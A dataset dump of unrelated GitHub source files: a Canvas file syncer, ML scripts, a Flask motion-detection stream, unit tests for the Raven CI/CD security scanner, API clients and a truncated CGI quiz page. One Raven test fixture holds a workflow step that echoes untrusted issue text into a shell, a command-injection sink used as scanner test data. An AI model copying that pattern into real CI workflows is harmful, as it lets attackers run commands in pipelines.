Exception:\n # Could not download, catch any exception\n self.print_status(u\"FAILED\", u\"red\", overwrite_previous_line=True)\n return -1\n\n # Check for OK 200 HTTP response\n if not response.status_code == 200:\n self.print_status(u\"FAILED\", u\"red\", overwrite_previous_line=True)\n return -1\n\n # If here, download was successful, write to disk and print status\n with open(self.sync_path, u\"wb\") as out_file:\n out_file.write(response.content)\n\n return True\n\n def walk(self, counter):\n \"\"\" Stop walking, endpoint \"\"\"\n print(text_type(self))\n\n counter[0] += 1\n return\n\n def sync(self):\n \"\"\"\n Attempt to download a file a the url 'download_url' to the path 'path'/filename while printing\n the status using an indent of print_indent to align with the parent object\n \"\"\"\n was_downloaded = self.download()\n\n if was_downloaded != - 1:\n self.print_status(u\"SYNCED\", color=u\"green\", overwrite_previous_line=was_downloaded)\n\n def show(self):\n \"\"\" Show the folder hierarchy by printing every level \"\"\"\n print(text_type(self))\n","repo_name":"perslev/CanvasSync","sub_path":"CanvasSync/entities/linked_file.py","file_name":"linked_file.py","file_ext":"py","file_size_in_byte":4856,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"77"} +{"seq_id":"75093019449","text":"import unittest\n\n\nclass MyTestCase(unittest.TestCase):\n def test_something(self):\n self.assertEqual(True, False)\n\n\nif __name__ == '__main__':\n unittest.main()\n\ndef main():\n log(green(\"PASS\"), \"Import mnist project\")\n try:\n check_get_mnist()\n check_closed_form()\n check_svm()\n check_compute_probabilities()\n check_compute_cost_function()\n check_run_gradient_descent_iteration()\n check_update_y()\n check_project_onto_PC()\n check_polynomial_kernel()\n check_rbf_kernel()\n except Exception:\n log_exit(traceback.format_exc())\n\nif __name__ == \"__main__\":\n main()\n\n# Unused codes\n# import unittest\n#\n#\n# class MyTestCase(unittest.TestCase):\n# def test_something(self):\n# self.assertEqual(True, False)\n#\n#\n# if __name__ == '__main__':\n# unittest.main()","repo_name":"asalimw/Digit_Recognition_Convulution_Neural_Network","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"12101529182","text":"#coding : utf-8\n\nimport sys\nimport numpy as np\nfrom RNmod import reseau \n\ndef quadrant(tab):\n \"\"\"\n tab: tableau de 2 élements (coordonnées)\n renvoie : une classe de positionnement\n |\n [0,1,0,0] | [1,0,0,0] \n _______|________\n |\n [0,0,1,0] | [0,0,0,1]\n |\n \"\"\"\n if tab[0] > 0 and tab[1] > 0: return [1.,0.,0.,0.]\n if tab[0] < 0 and tab[1] > 0: return [0.,1.,0.,0.]\n if tab[0] < 0 and tab[1] < 0: return [0.,0.,1.,0.]\n if tab[0] > 0 and tab[1] < 0: return [0.,0.,0.,1.]\n\n\nif __name__ == \"__main__\" :\n\n nn = [2,4,4,4]\n\n # ===============\n # apprentissage\n # ===============\n napp = 400\n epochs = 100000\n eta = 0.05 \n RN = reseau.MCP(nn,verbeux=2,verbe_periode=1000,distrib_poids=\"normale\")\n\n X0 = 2. * np.random.uniform(size=(napp,2)) - 1.\n T = np.array([quadrant(tab) for tab in X0])\n apprentissage = X0, T\n evaluation=[]\n W,B = RN.gradient_descent( apprentissage, epochs, eta, evaluation )\n\n # ===============\n # evaluation\n # ===============\n neval = 1000\n X0 = 20. * np.random.uniform(size=(neval,2)) - 10.\n T = np.array([quadrant(tab) for tab in X0])\n evaluation = X0,T\n\n RN= reseau.MCP(nn,verbeux=0,W=W,B=B, verbe_periode=100)\n Y = RN.gradient_descent( apprentissage, 100000, 1.0, evaluation )\n\n #print(Y)\n cok = 0\n for i,v in enumerate(T):\n# print(i,v) \n vt = np.argmax(v)\n ve = np.argmax(Y[i])\n coord = X0[i]\n print(coord,ve)\n if vt == ve:\n cok +=1 \n print()\n print()\n print(\"evaluation score : {:6.2f} %\".format(cok/neval*100.)) \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"FilipeVasconcelos/pia","sub_path":"quadrants.py","file_name":"quadrants.py","file_ext":"py","file_size_in_byte":1728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"70771028729","text":"\nfrom singlemotiondetector import SingleMotionDetector\nfrom imutils.video import VideoStream\nfrom flask import Response\nfrom flask import Flask\nfrom flask import render_template\nimport threading\nimport argparse\nimport datetime\nimport imutils\nimport time\nimport cv2\n\n# инициализация output frame and a lock используемую для обеспечения безопасности потока обмена выходных кадров(полезно для просмотра потока различными браузерами)\n# exchanges of the output frames (useful for multiple browsers/tabs\n# are viewing tthe stream)\noutputFrame = None\nlock = threading.Lock()\n\n# инициализация flask object\napp = Flask(__name__)\n\n# initialize the video stream and позволяет датчикам камеры разогреться(приготовиться)\nvs = VideoStream('http://camera.butovo.com/axis-cgi/mjpg/video.cgi?showlength=1').start()\ntime.sleep(2.0)\n\n# декоратор route() используется для привязки функции к URL\n@app.route(\"/\")\ndef index():\n # Для визуализации шаблона вы можете использовать м��тод render_template().\n # Всё, что вам необходимо - это указать имя шаблона, а также переменные в виде именованных аргументов,\n # которые вы хотите передать движку обработки шаблонов:\n return render_template(\"index.html\")\n\n\ndef detect_motion(frameCount):\n # захватить глобальные ссылки на видеопоток, выходной кадр и блокированных переменных\n global vs, outputFrame, lock\n\n # initialize the motion detector and the total number of frames\n # read thus far\n # инициализация детектора движения и общее число кадров\n md = SingleMotionDetector(accumWeight=0.1)\n total = 0\n\n # Цикл по кадрам видео потока\n\n while True:\n # прочитать следующий кадр из видео потока, изменить его размер,\n # преобразовать в grayscale и размываем его\n frame = vs.read()\n frame = imutils.resize(frame, width=800, height = 900)\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n gray = cv2.GaussianBlur(gray, (7, 7), 0)\n\n #возьмите текущую временную метку и нарисуйте ее на кадре\n timestamp = datetime.datetime.now()\n cv2.putText(frame, timestamp.strftime(\n \"%A %d %B %Y %I:%M:%S%p\"), (10, frame.shape[0] - 10),\n cv2.FONT_HERSHEY_SIMPLEX, 0.35, (0, 0, 255), 1)\n\n # если общее количество кадров достигло достаточного количества для построения разумной фоновой модели,\n # то продолжайте обработку кадра\n if total > frameCount:\n # определяем движение на кадре\n motion = md.detect(gray)\n\n # проверяем было ли найдено движение на кадре\n if motion is not None:\n # расспаковываем кортеж и рисуем ограничительную рамку территории движения на выходном кадре\n (thresh, (minX, minY, maxX, maxY)) = motion\n cv2.rectangle(frame, (minX, minY), (maxX, maxY),\n (0, 0, 255), 2)\n\n # Обновить фоновую модель и увеличить количество считанных кадров на данныйц момент\n md.update(gray)\n total += 1\n\n # получить блокировку, установить выходной кадр и освободить блокиовку\n\n with lock:\n outputFrame = frame.copy()\n\n\ndef generate():\n # захватить глобальные ссылки на видеопоток, выходной кадр и блокированных переменных\n global outputFrame, lock\n\n # Цикл по всем выходным кадрам\n while True:\n # Ждём пока не появится блокировка\n with lock:\n # проверяем есть ли следующий выходной кадр, иначе прерываем итерацию цикла\n if outputFrame is None:\n continue\n\n # форматируем кадр в jpg\n (flag, encodedImage) = cv2.imencode(\".jpg\", outputFrame)\n\n # убеждаемся что форматирование прошло успешно\n if not flag:\n continue\n\n # вывести выходной кадр в байтовом формате\n yield (b'--frame\\r\\n' b'Content-Type: image/jpeg\\r\\n\\r\\n' +\n bytearray(encodedImage) + b'\\r\\n')\n\n\n@app.route(\"/video_feed\")\ndef video_feed():\n #\n # вернуть сгенерированный ответ вместе с конкретным типом медиа (тип mime)\n return Response(generate(),\n mimetype=\"multipart/x-mixed-replace; boundary=frame\")\n\n\n#\n# проверить, является ли это основным потоком выполнения\nif __name__ == '__main__':\n # запустить поток, который будет выполнять обнаружение движения\n t = threading.Thread(target=detect_motion, args=(\n 32,))\n t.daemon = True\n t.start()\n\n # запускаем flask app\n app.run(host=\"127.0.0.1\", port=\"8080\", debug=True,\n threaded=True, use_reloader=False)\n\n# освободить указатель видеопотока\nvs.stop()\n","repo_name":"DonMins/StreamVideo","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6122,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"12460749204","text":"import src.workflow_components.workflow as workflow\nfrom tests.utils import load_test_config, assert_reusable_workflow_inputs\n\nload_test_config()\n\n\ndef test_job_from_dict_steps():\n job_d = {\n \"name\": \"issue-commented\",\n \"runs-on\": \"ubuntu-latest\",\n \"steps\": [\n {\n \"name\": \"Generate GitHub App token\",\n \"uses\": \"electron/github-app-auth-action@cc6751b3b5e4edc5b9a4ad0a021ac455653b6dc8\",\n \"id\": \"generate-token\",\n \"with\": {\"creds\": \"${{ secrets.ISSUE_TRIAGE_GH_APP_CREDS }}\"},\n },\n ],\n \"_id\": \"6347a06af34cc01c884c110fd9db8964\",\n \"path\": \"electron/electron/.github/workflows/issue-commented.yml\",\n \"url\": \"https://github.com/CycodeLabs/Raven/pull/1\",\n }\n\n job = workflow.Job.from_dict(job_d)\n\n assert job._id == job_d[\"_id\"]\n assert job.name == job_d[\"name\"]\n assert job.path == job_d[\"path\"]\n assert job.machine == [job_d[\"runs-on\"]]\n assert job.uses is None\n assert job.ref is None\n assert job.with_prop is None\n assert job.url == job_d[\"url\"]\n assert len(job.steps) == 1\n assert len(job.reusable_workflow) == 0\n\n\ndef test_workflow_from_dict():\n workflow_d = {\n \"name\": \"Release notes\",\n \"on\": {\"push\": {\"branches\": [\"main\"]}, \"workflow_dispatch\": None},\n \"permissions\": {\"contents\": \"read\"},\n \"jobs\": {\n \"update_release_draft\": {\n \"permissions\": {\"contents\": \"write\", \"pull-requests\": \"write\"},\n \"runs-on\": \"ubuntu-latest\",\n \"if\": \"github.repository == 'twbs/bootstrap'\",\n \"steps\": [\n {\n \"uses\": \"release-drafter/release-drafter@v5\",\n \"env\": {\"GITHUB_TOKEN\": \"${{ secrets.GITHUB_TOKEN }}\"},\n }\n ],\n }\n },\n \"path\": \"twbs/bootstrap/.github/workflows/release-notes.yml\",\n \"url\": \"https://github.com/CycodeLabs/Raven/pull/1\",\n \"is_public\": True,\n }\n\n wf = workflow.Workflow.from_dict(workflow_d)\n\n assert wf.name == workflow_d[\"name\"]\n assert wf.path == workflow_d[\"path\"]\n assert wf.trigger == [\"push\", \"workflow_dispatch\"]\n assert wf.permissions == [\"contents:read\"]\n assert wf.url == workflow_d[\"url\"]\n assert len(wf.jobs) == 1\n\n\ndef test_job_from_dict_uses():\n job_d = {\n \"name\": \"test-firefox-safari\",\n \"uses\": \"./.github/workflows/build_reusable.yml\",\n \"with\": {\n \"skipForDocsOnly\": \"yes\",\n },\n \"secrets\": \"inherit\",\n \"_id\": \"f796b4c01ecb6021e6a30ec7466ab11a\",\n \"path\": \"vercel/next.js/.github/workflows/build_and_test.yml\",\n \"url\": \"https://github.com/CycodeLabs/Raven/pull/1\",\n }\n\n job = workflow.Job.from_dict(job_d)\n\n assert job._id == job_d[\"_id\"]\n assert job.name == job_d[\"name\"]\n assert job.path == job_d[\"path\"]\n assert job.machine is None\n assert job.uses == job_d[\"uses\"]\n assert job.ref is None\n assert job.url == job_d[\"url\"]\n assert job.with_prop == [\"skipForDocsOnly:yes\"]\n assert len(job.steps) == 0\n\n\ndef test_step_from_dict_uses():\n step_d = {\n \"name\": \"Generate GitHub App token\",\n \"uses\": \"electron/github-app-auth-action@cc6751b3b5e4edc5b9a4ad0a021ac455653b6dc8\",\n \"with\": {\"creds\": \"${{ secrets.ISSUE_TRIAGE_GH_APP_CREDS }}\"},\n \"_id\": \"9a42f7bb6c8e5be00c1d36d54ac7bdb6\",\n \"path\": \"electron/electron/.github/workflows/issue-commented.yml\",\n \"url\": \"https://github.com/CycodeLabs/Raven/pull/1\",\n }\n\n step = workflow.Step.from_dict(step_d)\n\n assert step._id == step_d[\"_id\"]\n assert step.name == step_d[\"name\"]\n assert step.path == step_d[\"path\"]\n assert step.run is None\n assert step.uses == step_d[\"uses\"]\n assert step.url == step_d[\"url\"]\n assert step.ref == \"cc6751b3b5e4edc5b9a4ad0a021ac455653b6dc8\"\n assert step.with_prop == [\"creds:${{ secrets.ISSUE_TRIAGE_GH_APP_CREDS }}\"]\n\n\ndef test_step_from_dict_run():\n step_d = {\n \"name\": \"Autolabel based on affected areas\",\n \"run\": \"echo ${{ github.event.issue.body }}\",\n \"_id\": \"1386cfbaf5513e27c090 133287e01fe\",\n \"path\": \"vercel/next.js/.github/workflows/issue_validator.yml\",\n \"url\": \"https://github.com/CycodeLabs/Raven/pull/1\",\n }\n\n step = workflow.Step.from_dict(step_d)\n\n assert step._id == step_d[\"_id\"]\n assert step.name == step_d[\"name\"]\n assert step.path == step_d[\"path\"]\n assert step.uses is None\n assert step.run == step_d[\"run\"]\n assert step.ref is None\n assert step.url == step_d[\"url\"]\n assert step.with_prop is None\n assert len(step.using_param) == 1\n\n\ndef test_reusable_workflow_from_dict():\n workflow_d = {\n \"name\": \"Release notes\",\n \"on\": {\n \"workflow_call\": {\n \"inputs\": {\n \"input_1\": {\n \"required\": True,\n \"default\": \"default_value_1\",\n \"description\": \"description_1\",\n },\n \"input_2\": {\n \"required\": False,\n \"default\": \"default_value_2\",\n \"description\": \"description_2\",\n },\n }\n }\n },\n \"permissions\": {\"contents\": \"read\"},\n \"jobs\": {\n \"update_release_draft\": {\n \"permissions\": {\"contents\": \"write\", \"pull-requests\": \"write\"},\n \"runs-on\": \"ubuntu-latest\",\n \"if\": \"github.repository == 'twbs/bootstrap'\",\n \"steps\": [\n {\n \"uses\": \"release-drafter/release-drafter@v5\",\n \"env\": {\"GITHUB_TOKEN\": \"${{ secrets.GITHUB_TOKEN }}\"},\n }\n ],\n }\n },\n \"path\": \"twbs/bootstrap/.github/workflows/release-notes.yml\",\n \"url\": \"https://github.com/CycodeLabs/Raven/pull/1\",\n \"is_public\": True,\n }\n\n wf = workflow.Workflow.from_dict(workflow_d)\n\n assert wf.name == workflow_d[\"name\"]\n assert wf.path == workflow_d[\"path\"]\n assert wf.trigger == [\"workflow_call\"]\n assert wf.permissions == [\"contents:read\"]\n assert wf.url == workflow_d[\"url\"]\n assert len(wf.jobs) == 1\n\n assert_reusable_workflow_inputs(wf, workflow_d)\n","repo_name":"CycodeLabs/raven","sub_path":"tests/unit/test_workflow.py","file_name":"test_workflow.py","file_ext":"py","file_size_in_byte":6414,"program_lang":"python","lang":"en","doc_type":"code","stars":422,"dataset":"github-code","pt":"77"} +{"seq_id":"878601820","text":"veridion_match_enrich_api_key = (\n \"api-key\"\n)\nimport requests\nimport json\n\ndef company_profile(company_name, website):\n url = \"https://data.veridion.com/match/v4/companies\"\n headers = {\n \"x-api-key\": veridion_match_enrich_api_key,\n \"Content-type\": \"application/json\",\n }\n\n data = {\"commercial_names\": [company_name], \"website\": website}\n\n response = requests.post(url, headers=headers, json=data)\n\n json_response = response.json()\n\n company_informations = {}\n company_informations[\"company_commercial_names\"] = json_response[\n \"company_commercial_names\"\n ]\n company_informations[\"main_business_category\"] = json_response[\n \"main_business_category\"\n ]\n\n\n locations = []\n for location in json_response[\"locations\"]:\n if location[\"latitude\"] and location[\"longitude\"]:\n locations.append(location)\n\n company_informations[\"locations\"] = locations\n company_informations[\"num_locations\"] = json_response[\"num_locations\"]\n company_informations[\"employee_count\"] = json_response[\"employee_count\"]\n company_informations[\"estimated_revenue\"] = json_response[\"estimated_revenue\"]\n company_informations[\"main_country\"] = json_response[\"main_country\"]\n\n\n return json.dumps(company_informations, ensure_ascii=False).encode(\"utf-8\")\n","repo_name":"mihaescurazvan/Ecodion","sub_path":"dummy_script.py","file_name":"dummy_script.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"33310664707","text":"from services.market.MarketService import MarketService\n\n\n# returns list of provived tickers after main command\ndef get_provided_tickers(command):\n\t# retrieving params passed after main command\n\ttickers = command.split(' ')[1::]\n\treturn tickers\n\n\n# iterates through tickers and apply passed template\ndef format_data_via_template(data, template):\n\tresponse_text = ''\n\n\t# formatting data from ticker\n\tfor ticker in data:\n\t\tfor key in ticker:\n\t\t\tif ticker[key] is None:\n\t\t\t\tticker[key] = '-'\n\n\t\tticker_text = template.format(ticker=ticker)\n\t\tresponse_text += ticker_text\n\t\n\treturn response_text\n\n\n# returns ticker template according to passed tempate type\ndef get_ticker_template(template_type):\n\tminimal_ticker_template = \"\\\n\t\tTicker: {ticker[ticker]}\\n\\\n\t\tName: {ticker[name]}\\n\\\n\t\tPrice: {ticker[askPrice]}\\\n\t\\n\\n\"\n\n\tdetailed_ticker_template = \"\\\n\t\tTicker: {ticker[ticker]}\\n\\\n\t\tName: {ticker[name]}\\n\\\n\t\tBid price: {ticker[bidPrice]}\\n\\\n\t\tBid size: {ticker[bidSize]}\\n\\\n\t\tAsk price: {ticker[askPrice]}\\n\\\n\t\tAsk size: {ticker[askSize]}\\n\\\n\t\tLast trade: {ticker[last]}\\n\\\n\t\tLow price: {ticker[low]}\\n\\\n\t\tHigh price: {ticker[high]}\\n\\\n\t\tOpen price: {ticker[open]}\\n\\\n\t\tPrevious close price: {ticker[prevClose]}\\\n\t\\n\\n\"\n\n\ttemplate = None\n\n\tif template_type == 'minimal': \n\t\ttemplate = minimal_ticker_template\n\telif template_type == 'detailed':\n\t\ttemplate = detailed_ticker_template\n\n\treturn template\n\n\n# sends data of market tickers or data of provided tickers\ndef send_market_data(bot, message):\n\tprovided_tickers = get_provided_tickers(message.text)\n\n\t# if ticker was provided\n\tif(len(provided_tickers) > 0):\n\t\tdata = MarketService.get_tickers_data(provided_tickers)\t\t\n\t\tresponse_template = get_ticker_template('detailed')\n\n\t\t# if provided tickers are incorrect\n\t\tif(len(data) <= 0):\n\t\t\treturn bot.send_message(message.chat.id, 'You have provided non-existing tickers')\n\n\telse:\n\t\tdata = MarketService.get_market_data()\n\t\tresponse_template = get_ticker_template('minimal')\n\t\t\n\t\t# if stock market has no tickers\n\t\tif len(data) <= 0:\n\t\t\treturn bot.send_message(message.chat.id, 'There are no avaliable stocks on PyFinance Market right now')\n\n\n\tresponse_text = 'PyFinance Stock Market:\\n\\n'\n\tresponse_text += format_data_via_template(data, response_template)\n\tresponse_text += '\\nAll prices are specified in USD\\n\\n'\n\n\tbot.send_message(message.chat.id, text=response_text, parse_mode='HTML')\n\n\n","repo_name":"Vladislav0Art/PyFinance","sub_path":"services/bot/methods/send_market_data.py","file_name":"send_market_data.py","file_ext":"py","file_size_in_byte":2518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"28850077192","text":"import json\nimport re\n\nimport numpy as np\nfrom joblib import dump\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.feature_selection import SelectKBest, chi2\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.preprocessing import StandardScaler\n\n\ndef get_feature_names(path):\n names = []\n regex = re.compile(r'^(.+)\\:\\s+(.+)\\.$')\n\n with open(path) as file:\n for line in file:\n match = regex.match(line)\n if match:\n names.append(match.group(1))\n\n return names\n\n\ndataset_dir = '../../../../spambase/'\nfeature_names = get_feature_names(dataset_dir + 'spambase.names')\nwith open(\"feature_names.json\", \"w\") as f:\n json.dump(feature_names, f)\n\ndata = np.genfromtxt(dataset_dir + 'spambase.data', delimiter=',')\n\nX, y = data[:, :-1], data[:, -1]\n\npipeline = Pipeline([\n ('feature_selection', SelectKBest(chi2, k=45)),\n ('scaler', StandardScaler()),\n ('classifier', RandomForestClassifier(n_estimators=300, max_features='log2'))\n])\n\npipeline.fit(X, y)\n\ndump(pipeline, 'model.joblib')\n","repo_name":"adam-kwiatkowski/spambase-ml","sub_path":"backend/app/models/ml/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"43317997333","text":"import sys\nimport re\nimport socket\nimport struct\nimport operator\n\ndef ip_address_is_valid(address):\n if address < 0x1000000:\n return False\n try:\n socket.inet_aton(int_to_formatted_ip(address))\n except socket.error:\n return False\n except struct.error:\n return False\n else:\n return True\n\ndef int_to_formatted_ip(x):\n return socket.inet_ntoa(struct.pack('!L', x))\n\ndef _find_helper(regex, formatter, content):\n ips = []\n for m in re.finditer(regex, content):\n ips.append(formatter(m.group(1)))\n return content, ips\n\ndef find_binary(content):\n regex = \"([0,1]{8}[\\.]?[0-1]{8}[\\.]?[0-1]{8}[\\.]?[0-1]{8})\"\n def formatter(ip):\n return int(ip.replace(\".\", \"\"), 2)\n return _find_helper(regex, formatter, content)\n\ndef find_dotted_hex(content):\n regex = \"(0x[0-9a-fA-F]{2}\\.0x[0-9a-fA-F]{2}\\.0x[0-9a-fA-F]{2}\\.0x[0-9a-fA-F]{2})\"\n def formatter(ip):\n return int(ip.replace(\"0x\", \"\").replace(\".\", \"\"), 16)\n return _find_helper(regex, formatter, content)\n\ndef find_dotted_octal(content):\n regex = \"([0-7]{4}\\.[0-7]{4}\\.[0-7]{4}\\.[0-7]{4})\"\n def formatter(ip):\n int_value = 0\n for sub_octal in ip.split('.'):\n int_value <<= 8\n int_value |= int(sub_octal, 8)\n return int_value\n return _find_helper(regex, formatter, content)\n\ndef find_dotted_decimal(content):\n regex = \"([0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3})\"\n def formatter(ip):\n int_value = 0\n for sub in ip.split('.'):\n int_value <<= 8\n int_value |= int(sub)\n return int_value\n return _find_helper(regex, formatter, content)\n\ndef find_hex(content):\n regex = \"(0x[0-9a-fA-F]{8})\"\n def formatter(ip):\n return int(ip.replace(\"0x\", \"\"), 16)\n return _find_helper(regex, formatter, content)\n\ndef find_octal(content):\n regex = \"(0[0-7]+)\"\n def formatter(ip):\n return int(ip, 8)\n\n return _find_helper(regex, formatter, content)\ndef find_decimal(content):\n regex = \"([0-9]+)\"\n def formatter(ip):\n return int(ip)\n return _find_helper(regex, formatter, content)\n\ndef main(content):\n all_ips = []\n for func in [find_dotted_octal, find_dotted_hex, find_binary,\n find_dotted_decimal, find_hex, find_octal, find_decimal]:\n content, ips = func(content)\n all_ips.extend(ips)\n all_ips_frequency_map = {}\n for ip in all_ips:\n if not ip_address_is_valid(ip):\n continue\n if ip in all_ips_frequency_map:\n all_ips_frequency_map[ip] += 1\n else:\n all_ips_frequency_map[ip] = 1\n sorted_ips = sorted(all_ips_frequency_map.items(), key=operator.itemgetter(1), reverse=True)\n max_frequency = sorted_ips[0][1]\n result = []\n for ip in sorted_ips:\n if ip[1] != max_frequency:\n break\n result.append(int_to_formatted_ip(ip[0]))\n print(' '.join(result))\n\nif __name__ == \"__main__\":\n with open(sys.argv[1], 'r') as content_file:\n content = content_file.read()\n main(content)\n","repo_name":"daleysoftware/codeeval","sub_path":"1-moderate/seek-for-an-intruder/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3089,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"77"} +{"seq_id":"20084900486","text":"import unittest\nfrom mock import Mock\nfrom mock import patch\nimport re\n\nimport web_scraping\n\n\nclass TestWebScraping(unittest.TestCase):\n def setUp(self):\n self.mock_log = Mock()\n web_scraping.WebScraping.log = self.mock_log\n\n self.mock_gauge = Mock()\n web_scraping.WebScraping.gauge = self.mock_gauge\n\n self.requests_patcher = patch('web_scraping.requests.get')\n self.mock_requests = self.requests_patcher.start()\n\n self.mock_content = Mock()\n\n def tearDown(self):\n self.requests_patcher.stop()\n\n def setup_mock(self, content=None):\n self.mock_log.reset_mock()\n self.mock_gauge.reset_mock()\n self.mock_requests.reset_mock()\n self.mock_content.reset_mock()\n if content is not None:\n self.mock_content.content = content\n self.mock_requests.return_value = self.mock_content\n else:\n self.mock_requests.side_effect = Exception('fail')\n\n def get_log(self, level, order):\n log = getattr(self.mock_log, level)\n return log.call_args_list[order - 1][0][0]\n\n def assert_log(self, level, order, string):\n self.assertEqual(self.get_log(level, order), string)\n\n def assert_log_match(self, level, order, match):\n self.assertTrue(re.match(match, self.get_log(level, order)))\n\n def assert_log_count(self, level, count):\n log = getattr(self.mock_log, level)\n if count == 0:\n log.assert_not_called()\n else:\n self.assertEqual(len(log.call_args_list), count)\n\n def assert_gauge(self, name, num):\n self.mock_gauge.assert_called_with(name, num)\n\n def assert_gauge_not_called(self):\n self.mock_gauge.assert_not_called()\n\n def assert_request_url(self, url):\n self.assertEqual(self.mock_requests.call_args[0][0], url)\n\n def assert_request_not_called(self):\n self.mock_requests.assert_not_called()\n\n def test_validation(self):\n ws = web_scraping.WebScraping()\n\n self.setup_mock()\n ws.check({})\n self.assert_log_count('info', 0)\n self.assert_log_count('error', 1)\n self.assert_log('error', 1, 'skipping instance, no name found.')\n self.assert_request_not_called()\n self.assert_gauge_not_called()\n\n self.setup_mock()\n ws.check({ 'name' : 'test' })\n self.assert_log_count('info', 0)\n self.assert_log_count('error', 1)\n self.assert_log('error', 1, 'skipping instance, no url found.')\n self.assert_request_not_called()\n self.assert_gauge_not_called()\n\n self.setup_mock()\n ws.check({ 'name' : 'test', 'url' : 'http://example.com' })\n self.assert_log_count('info', 0)\n self.assert_log_count('error', 1)\n self.assert_log('error', 1, 'skipping instance, no xpath found.')\n self.assert_request_not_called()\n self.assert_gauge_not_called()\n\n def test_invalid_url(self):\n name = 'test'\n url = 'bad url'\n\n self.setup_mock()\n ws = web_scraping.WebScraping()\n ws.check({\n 'name' : name,\n 'url' : url,\n 'xpath' : '',\n })\n\n self.assert_log_count('info', 0)\n self.assert_log_count('error', 1)\n self.assert_log_match('error', 1, r'%s : failed to get website' % name)\n self.assert_request_url(url)\n self.assert_gauge_not_called()\n\n def test_invalid_value(self):\n name = 'test'\n url = 'http://example.com'\n\n self.setup_mock('
test
')\n ws = web_scraping.WebScraping()\n ws.check({\n 'name' : name,\n 'url' : url,\n 'xpath' : '//*[@id=\"hoge\"]/text()',\n })\n\n self.assert_log_count('info', 0)\n self.assert_log_count('error', 1)\n self.assert_log('error', 1, '%s : failed to get value (default value used) : could not convert string to float: ' % name)\n self.assert_request_url(url)\n self.assert_gauge_not_called()\n\n def test_success(self):\n name = 'test'\n url = 'http://example.com'\n value = '-100.1'\n\n self.setup_mock('
test=%s
' % value)\n ws = web_scraping.WebScraping()\n ws.check({\n 'name' : name,\n 'url' : url,\n 'xpath' : '//*[@id=\"hoge\"]/text()',\n })\n\n self.assert_log_count('info', 1)\n self.assert_log('info', 1, '%s = %f' % (name, float(value)))\n self.assert_log_count('error', 0)\n self.assert_request_url(url)\n self.assert_gauge(name, float(value))\n\n def test_default_value(self):\n name = 'test'\n url = 'http://example.com'\n default_value = '100.2'\n\n self.setup_mock('
test=-100.1
')\n ws = web_scraping.WebScraping()\n ws.check({\n 'name' : name,\n 'url' : url,\n 'xpath' : '//*[@id=\"fuga\"]/text()',\n 'default' : default_value,\n })\n\n self.assert_log_count('info', 2)\n self.assert_log('info', 1, '%s : failed to get value (default value used)' % name)\n self.assert_log('info', 2, '%s = %f' % (name, float(default_value)))\n self.assert_log_count('error', 0)\n self.assert_request_url(url)\n self.assert_gauge(name, float(default_value))\n\n def test_invalid_default_value(self):\n name = 'test'\n url = 'http://example.com'\n default_value = 'invalid'\n\n self.setup_mock('
test=-100.1
')\n ws = web_scraping.WebScraping()\n ws.check({\n 'name' : name,\n 'url' : url,\n 'xpath' : '//*[@id=\"fuga\"]/text()',\n 'default' : default_value,\n })\n\n self.assert_log_count('info', 1)\n self.assert_log('info', 1, '%s : failed to get value (default value used)' % name)\n self.assert_log_count('error', 1)\n self.assert_log('error', 1, '%s : invalid default value : could not convert string to float: %s' % (name, default_value))\n self.assert_request_url(url)\n self.assert_gauge_not_called()\n","repo_name":"mounemoi/datadog-web-scraper","sub_path":"tests/test_web_scraping.py","file_name":"test_web_scraping.py","file_ext":"py","file_size_in_byte":6166,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"77"} +{"seq_id":"16668845211","text":"#!/usr/local/bin/python3\n\nfrom cgitb import enable\nenable()\n\nfrom cgi import FieldStorage\nfrom html import escape\nfrom hashlib import sha256\nfrom time import time\nfrom shelve import open\nfrom http.cookies import SimpleCookie\n\n\nform_data = FieldStorage()\nattempt = ''\nresult = ''\njavascript =''\nscore = escape(form_data.getfirst('score', '').strip())\nif len(form_data) != 0:\n attempt = escape(form_data.getfirst('guess', '').strip())\n if not attempt:\n result =\"

Please select either A,B or C \"\n else:\n try:\n if attempt == \"A\":\n result =\"\"\"

Correct

\"\"\"\n javascript =\"\"\"\"\"\"\n if attempt == \"B\":\n result =\"

Incorrect

\"\n javascript =\"\"\"\"\"\"\n if attempt == \"C\":\n result =\"

Incorrect

\"\n javascript =\"\"\"\"\"\"\n except:\n result = \"

Sorry we are experiencing problems please contact later

\"\n\n\n\n\n\n\nprint('Content-Type: text/html')\nprint()\nprint(\"\"\"\n \n \n \n \n\n %s\n \n Zombie Mayhem\n \n \n
\n

What day is World Zombie Day?

\n \n \n \n \n \n \n \n
\n\n\n \n

Score so far:%s

